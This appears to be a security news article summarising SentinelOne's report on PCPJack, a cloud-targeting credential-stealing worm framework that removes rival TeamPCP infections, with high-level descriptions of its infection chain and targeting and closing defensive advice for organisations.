Cybersecurity researchers have uncovered a new malware framework called PCPJack that targets cloud infrastructure, removes infections linked to the TeamPCP hacking group, and steals sensitive credentials from compromised systems. The malware campaign was identified by SentinelOne researchers, who described PCPJack as a worm-like framework focused on credential theft and cloud propagation.
According to the researchers, PCPJack appears to specifically hunt for traces of TeamPCP malware and removes associated tools, processes, and artifacts before deploying its own malicious payloads. Experts believe the campaign may be operated by a former TeamPCP member or someone highly familiar with the group’s infrastructure and tactics.
The malware primarily targets exposed cloud environments and vulnerable web applications, including Docker, Kubernetes, Redis, MongoDB, RayML, and various Linux-based systems. SentinelOne noted that PCPJack can move laterally across networks and spread itself using known software vulnerabilities in platforms such as Next.js, WordPress plugins, and CentOS Web Panel.
Researchers explained that infections begin with a Linux shell script that prepares the environment and downloads additional payloads from attacker-controlled AWS S3 infrastructure. The malware then creates a Python virtual environment and deploys several modules designed for credential harvesting, cloud scanning, lateral movement, encrypted command-and-control communication, and propagation across connected systems.
Unlike many cloud-focused malware campaigns, PCPJack does not deploy cryptocurrency miners. Instead, the framework appears focused on stealing credentials tied to financial services, enterprise software, messaging platforms, cloud accounts, and developer environments. Researchers warned that the stolen access could later be used for fraud, spam operations, extortion, or resale on underground markets.
One of the malware’s more unusual features is its use of Common Crawl parquet files to identify internet-facing targets more efficiently. Security researchers noted that this method allows attackers to locate valid and responsive hosts without relying on noisy mass-scanning techniques, making the activity harder to detect.
The discovery comes amid broader concerns surrounding TeamPCP, a threat group linked to several major supply chain attacks earlier in 2026. The group previously targeted GitHub Actions, Docker Hub, PyPI packages, developer tools, and CI/CD pipelines to steal secrets and compromise cloud-native environments.
Security experts are advising organizations to secure exposed cloud services, monitor unusual changes in container and Kubernetes environments, patch vulnerable applications, audit installed packages, and closely monitor credential usage patterns to reduce the risk of compromise.
